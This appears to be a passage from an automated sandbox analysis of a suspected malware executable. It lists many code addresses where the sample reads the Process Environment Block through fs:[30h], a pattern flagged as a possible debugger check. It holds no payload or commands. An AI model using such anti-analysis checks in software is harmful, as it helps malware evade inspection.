            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0770 mov eax, dword ptr fs:[00000030h]4_2_019F0770
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0770 mov eax, dword ptr fs:[00000030h]4_2_019F0770
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0770 mov eax, dword ptr fs:[00000030h]4_2_019F0770
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0770 mov eax, dword ptr fs:[00000030h]4_2_019F0770
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0770 mov eax, dword ptr fs:[00000030h]4_2_019F0770
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22750 mov eax, dword ptr fs:[00000030h]4_2_01A22750
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22750 mov eax, dword ptr fs:[00000030h]4_2_01A22750
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A64755 mov eax, dword ptr fs:[00000030h]4_2_01A64755
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6E75D mov eax, dword ptr fs:[00000030h]4_2_01A6E75D
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1C6A6 mov eax, dword ptr fs:[00000030h]4_2_01A1C6A6
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E4690 mov eax, dword ptr fs:[00000030h]4_2_019E4690
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E4690 mov eax, dword ptr fs:[00000030h]4_2_019E4690
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A166B0 mov eax, dword ptr fs:[00000030h]4_2_01A166B0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A5E6F2 mov eax, dword ptr fs:[00000030h]4_2_01A5E6F2
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A5E6F2 mov eax, dword ptr fs:[00000030h]4_2_01A5E6F2
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A5E6F2 mov eax, dword ptr fs:[00000030h]4_2_01A5E6F2
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A5E6F2 mov eax, dword ptr fs:[00000030h]4_2_01A5E6F2
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A606F1 mov eax, dword ptr fs:[00000030h]4_2_01A606F1
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A606F1 mov eax, dword ptr fs:[00000030h]4_2_01A606F1
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1A6C7 mov ebx, dword ptr fs:[00000030h]4_2_01A1A6C7
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1A6C7 mov eax, dword ptr fs:[00000030h]4_2_01A1A6C7
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A16620 mov eax, dword ptr fs:[00000030h]4_2_01A16620
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A18620 mov eax, dword ptr fs:[00000030h]4_2_01A18620
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F260B mov eax, dword ptr fs:[00000030h]4_2_019F260B
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F260B mov eax, dword ptr fs:[00000030h]4_2_019F260B
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F260B mov eax, dword ptr fs:[00000030h]4_2_019F260B
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F260B mov eax, dword ptr fs:[00000030h]4_2_019F260B
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F260B mov eax, dword ptr fs:[00000030h]4_2_019F260B
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F260B mov eax, dword ptr fs:[00000030h]4_2_019F260B
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F260B mov eax, dword ptr fs:[00000030h]4_2_019F260B
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A5E609 mov eax, dword ptr fs:[00000030h]4_2_01A5E609
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E262C mov eax, dword ptr fs:[00000030h]4_2_019E262C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019FE627 mov eax, dword ptr fs:[00000030h]4_2_019FE627
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22619 mov eax, dword ptr fs:[00000030h]4_2_01A22619
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1A660 mov eax, dword ptr fs:[00000030h]4_2_01A1A660
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1A660 mov eax, dword ptr fs:[00000030h]4_2_01A1A660
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AA866E mov eax, dword ptr fs:[00000030h]4_2_01AA866E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AA866E mov eax, dword ptr fs:[00000030h]4_2_01AA866E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A12674 mov eax, dword ptr fs:[00000030h]4_2_01A12674
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019FC640 mov eax, dword ptr fs:[00000030h]4_2_019FC640
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A689B3 mov esi, dword ptr fs:[00000030h]4_2_01A689B3
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A689B3 mov eax, dword ptr fs:[00000030h]4_2_01A689B3
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A689B3 mov eax, dword ptr fs:[00000030h]4_2_01A689B3
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E09AD mov eax, dword ptr fs:[00000030h]4_2_019E09AD
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E09AD mov eax, dword ptr fs:[00000030h]4_2_019E09AD
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F29A0 mov eax, dword ptr fs:[00000030h]4_2_019F29A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F29A0 mov eax, dword ptr fs:[00000030h]4_2_019F29A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F29A0 mov eax, dword ptr fs:[00000030h]4_2_019F29A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F29A0 mov eax, dword ptr fs:[00000030h]4_2_019F29A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F29A0 mov eax, dword ptr fs:[00000030h]4_2_019F29A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F29A0 mov eax, dword ptr fs:[00000030h]4_2_019F29A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F29A0 mov eax, dword ptr fs:[00000030h]4_2_019F29A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F29A0 mov eax, dword ptr fs:[00000030h]4_2_019F29A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F29A0 mov eax, dword ptr fs:[00000030h]4_2_019F29A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F29A0 mov eax, dword ptr fs:[00000030h]4_2_019F29A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F29A0 mov eax, dword ptr fs:[00000030h]4_2_019F29A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F29A0 mov eax, dword ptr fs:[00000030h]4_2_019F29A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F29A0 mov eax, dword ptr fs:[00000030h]4_2_019F29A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6E9E0 mov eax, dword ptr fs:[00000030h]4_2_01A6E9E0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EA9D0 mov eax, dword ptr fs:[00000030h]4_2_019EA9D0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EA9D0 mov eax, dword ptr fs:[00000030h]4_2_019EA9D0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EA9D0 mov eax, dword ptr fs:[00000030h]4_2_019EA9D0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EA9D0 mov eax, dword ptr fs:[00000030h]4_2_019EA9D0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EA9D0 mov eax, dword ptr fs:[00000030h]4_2_019EA9D0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EA9D0 mov eax, dword ptr fs:[00000030h]4_2_019EA9D0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A129F9 mov eax, dword ptr fs:[00000030h]4_2_01A129F9
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A129F9 mov eax, dword ptr fs:[00000030h]4_2_01A129F9
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A769C0 mov eax, dword ptr fs:[00000030h]4_2_01A769C0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A149D0 mov eax, dword ptr fs:[00000030h]4_2_01A149D0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AAA9D3 mov eax, dword ptr fs:[00000030h]4_2_01AAA9D3
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019D8918 mov eax, dword ptr fs:[00000030h]4_2_019D8918
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019D8918 mov eax, dword ptr fs:[00000030h]4_2_019D8918
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6892A mov eax, dword ptr fs:[00000030h]4_2_01A6892A
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A7892B mov eax, dword ptr fs:[00000030h]4_2_01A7892B
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A5E908 mov eax, dword ptr fs:[00000030h]4_2_01A5E908
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A5E908 mov eax, dword ptr fs:[00000030h]4_2_01A5E908
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6C912 mov eax, dword ptr fs:[00000030h]4_2_01A6C912
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A06962 mov eax, dword ptr fs:[00000030h]4_2_01A06962
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A06962 mov eax, dword ptr fs:[00000030h]4_2_01A06962
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A06962 mov eax, dword ptr fs:[00000030h]4_2_01A06962
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A2096E mov eax, dword ptr fs:[00000030h]4_2_01A2096E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A2096E mov edx, dword ptr fs:[00000030h]4_2_01A2096E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A2096E mov eax, dword ptr fs:[00000030h]4_2_01A2096E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A84978 mov eax, dword ptr fs:[00000030h]4_2_01A84978
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A84978 mov eax, dword ptr fs:[00000030h]4_2_01A84978
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6C97C mov eax, dword ptr fs:[00000030h]4_2_01A6C97C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A60946 mov eax, dword ptr fs:[00000030h]4_2_01A60946
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E0887 mov eax, dword ptr fs:[00000030h]4_2_019E0887
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6C89D mov eax, dword ptr fs:[00000030h]4_2_01A6C89D
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AAA8E4 mov eax, dword ptr fs:[00000030h]4_2_01AAA8E4
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1C8F9 mov eax, dword ptr fs:[00000030h]4_2_01A1C8F9
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1C8F9 mov eax, dword ptr fs:[00000030h]4_2_01A1C8F9
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0E8C0 mov eax, dword ptr fs:[00000030h]4_2_01A0E8C0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1A830 mov eax, dword ptr fs:[00000030h]4_2_01A1A830
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8483A mov eax, dword ptr fs:[00000030h]4_2_01A8483A
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8483A mov eax, dword ptr fs:[00000030h]4_2_01A8483A
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A02835 mov eax, dword ptr fs:[00000030h]4_2_01A02835
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A02835 mov eax, dword ptr fs:[00000030h]4_2_01A02835
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A02835 mov eax, dword ptr fs:[00000030h]4_2_01A02835
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A02835 mov ecx, dword ptr fs:[00000030h]4_2_01A02835
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A02835 mov eax, dword ptr fs:[00000030h]4_2_01A02835
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A02835 mov eax, dword ptr fs:[00000030h]4_2_01A02835
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6C810 mov eax, dword ptr fs:[00000030h]4_2_01A6C810
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E4859 mov eax, dword ptr fs:[00000030h]4_2_019E4859
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E4859 mov eax, dword ptr fs:[00000030h]4_2_019E4859
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6E872 mov eax, dword ptr fs:[00000030h]4_2_01A6E872
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6E872 mov eax, dword ptr fs:[00000030h]4_2_01A6E872
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A76870 mov eax, dword ptr fs:[00000030h]4_2_01A76870
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A76870 mov eax, dword ptr fs:[00000030h]4_2_01A76870
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F2840 mov ecx, dword ptr fs:[00000030h]4_2_019F2840
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A10854 mov eax, dword ptr fs:[00000030h]4_2_01A10854
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A94BB0 mov eax, dword ptr fs:[00000030h]4_2_01A94BB0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A94BB0 mov eax, dword ptr fs:[00000030h]4_2_01A94BB0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0BBE mov eax, dword ptr fs:[00000030h]4_2_019F0BBE
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0BBE mov eax, dword ptr fs:[00000030h]4_2_019F0BBE
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E0BCD mov eax, dword ptr fs:[00000030h]4_2_019E0BCD
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E0BCD mov eax, dword ptr fs:[00000030h]4_2_019E0BCD
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E0BCD mov eax, dword ptr fs:[00000030h]4_2_019E0BCD
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6CBF0 mov eax, dword ptr fs:[00000030h]4_2_01A6CBF0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0EBFC mov eax, dword ptr fs:[00000030h]4_2_01A0EBFC
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A00BCB mov eax, dword ptr fs:[00000030h]4_2_01A00BCB
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A00BCB mov eax, dword ptr fs:[00000030h]4_2_01A00BCB
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A00BCB mov eax, dword ptr fs:[00000030h]4_2_01A00BCB
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E8BF0 mov eax, dword ptr fs:[00000030h]4_2_019E8BF0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E8BF0 mov eax, dword ptr fs:[00000030h]4_2_019E8BF0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E8BF0 mov eax, dword ptr fs:[00000030h]4_2_019E8BF0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8EBD0 mov eax, dword ptr fs:[00000030h]4_2_01A8EBD0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0EB20 mov eax, dword ptr fs:[00000030h]4_2_01A0EB20
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0EB20 mov eax, dword ptr fs:[00000030h]4_2_01A0EB20
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AA8B28 mov eax, dword ptr fs:[00000030h]4_2_01AA8B28
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AA8B28 mov eax, dword ptr fs:[00000030h]4_2_01AA8B28
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A5EB1D mov eax, dword ptr fs:[00000030h]4_2_01A5EB1D
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A5EB1D mov eax, dword ptr fs:[00000030h]4_2_01A5EB1D
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A5EB1D mov eax, dword ptr fs:[00000030h]4_2_01A5EB1D
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A5EB1D mov eax, dword ptr fs:[00000030h]4_2_01A5EB1D
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A5EB1D mov eax, dword ptr fs:[00000030h]4_2_01A5EB1D
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A5EB1D mov eax, dword ptr fs:[00000030h]4_2_01A5EB1D
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A5EB1D mov eax, dword ptr fs:[00000030h]4_2_01A5EB1D
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A5EB1D mov eax, dword ptr fs:[00000030h]4_2_01A5EB1D
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A5EB1D mov eax, dword ptr fs:[00000030h]4_2_01A5EB1D
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A94B4B mov eax, dword ptr fs:[00000030h]4_2_01A94B4B
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A94B4B mov eax, dword ptr fs:[00000030h]4_2_01A94B4B
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019DCB7E mov eax, dword ptr fs:[00000030h]4_2_019DCB7E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A76B40 mov eax, dword ptr fs:[00000030h]4_2_01A76B40
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A76B40 mov eax, dword ptr fs:[00000030h]4_2_01A76B40
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AAAB40 mov eax, dword ptr fs:[00000030h]4_2_01AAAB40
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A88B42 mov eax, dword ptr fs:[00000030h]4_2_01A88B42
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8EB50 mov eax, dword ptr fs:[00000030h]4_2_01A8EB50
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A36AA4 mov eax, dword ptr fs:[00000030h]4_2_01A36AA4
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EEA80 mov eax, dword ptr fs:[00000030h]4_2_019EEA80
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EEA80 mov eax, dword ptr fs:[00000030h]4_2_019EEA80
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EEA80 mov eax, dword ptr fs:[00000030h]4_2_019EEA80
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EEA80 mov eax, dword ptr fs:[00000030h]4_2_019EEA80
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EEA80 mov eax, dword ptr fs:[00000030h]4_2_019EEA80
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EEA80 mov eax, dword ptr fs:[00000030h]4_2_019EEA80
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EEA80 mov eax, dword ptr fs:[00000030h]4_2_019EEA80
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EEA80 mov eax, dword ptr fs:[00000030h]4_2_019EEA80
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EEA80 mov eax, dword ptr fs:[00000030h]4_2_019EEA80
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AB4A80 mov eax, dword ptr fs:[00000030h]4_2_01AB4A80
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A18A90 mov edx, dword ptr fs:[00000030h]4_2_01A18A90
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E8AA0 mov eax, dword ptr fs:[00000030h]4_2_019E8AA0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E8AA0 mov eax, dword ptr fs:[00000030h]4_2_019E8AA0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E0AD0 mov eax, dword ptr fs:[00000030h]4_2_019E0AD0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1AAEE mov eax, dword ptr fs:[00000030h]4_2_01A1AAEE
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1AAEE mov eax, dword ptr fs:[00000030h]4_2_01A1AAEE
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A36ACC mov eax, dword ptr fs:[00000030h]4_2_01A36ACC
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A36ACC mov eax, dword ptr fs:[00000030h]4_2_01A36ACC
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A36ACC mov eax, dword ptr fs:[00000030h]4_2_01A36ACC
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A14AD0 mov eax, dword ptr fs:[00000030h]4_2_01A14AD0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A14AD0 mov eax, dword ptr fs:[00000030h]4_2_01A14AD0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1CA24 mov eax, dword ptr fs:[00000030h]4_2_01A1CA24
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0EA2E mov eax, dword ptr fs:[00000030h]4_2_01A0EA2E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A04A35 mov eax, dword ptr fs:[00000030h]4_2_01A04A35
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A04A35 mov eax, dword ptr fs:[00000030h]4_2_01A04A35
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1CA38 mov eax, dword ptr fs:[00000030h]4_2_01A1CA38
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6CA11 mov eax, dword ptr fs:[00000030h]4_2_01A6CA11
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0A5B mov eax, dword ptr fs:[00000030h]4_2_019F0A5B
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0A5B mov eax, dword ptr fs:[00000030h]4_2_019F0A5B
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8EA60 mov eax, dword ptr fs:[00000030h]4_2_01A8EA60
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1CA6F mov eax, dword ptr fs:[00000030h]4_2_01A1CA6F
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1CA6F mov eax, dword ptr fs:[00000030h]4_2_01A1CA6F
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1CA6F mov eax, dword ptr fs:[00000030h]4_2_01A1CA6F
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E6A50 mov eax, dword ptr fs:[00000030h]4_2_019E6A50
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E6A50 mov eax, dword ptr fs:[00000030h]4_2_019E6A50
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E6A50 mov eax, dword ptr fs:[00000030h]4_2_019E6A50
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E6A50 mov eax, dword ptr fs:[00000030h]4_2_019E6A50
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E6A50 mov eax, dword ptr fs:[00000030h]4_2_019E6A50
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E6A50 mov eax, dword ptr fs:[00000030h]4_2_019E6A50
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E6A50 mov eax, dword ptr fs:[00000030h]4_2_019E6A50
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A5CA72 mov eax, dword ptr fs:[00000030h]4_2_01A5CA72
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A5CA72 mov eax, dword ptr fs:[00000030h]4_2_01A5CA72
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A16DA0 mov eax, dword ptr fs:[00000030h]4_2_01A16DA0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AA8DAE mov eax, dword ptr fs:[00000030h]4_2_01AA8DAE
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AA8DAE mov eax, dword ptr fs:[00000030h]4_2_01AA8DAE
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AB4DAD mov eax, dword ptr fs:[00000030h]4_2_01AB4DAD
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1CDB1 mov ecx, dword ptr fs:[00000030h]4_2_01A1CDB1
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1CDB1 mov eax, dword ptr fs:[00000030h]4_2_01A1CDB1
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1CDB1 mov eax, dword ptr fs:[00000030h]4_2_01A1CDB1
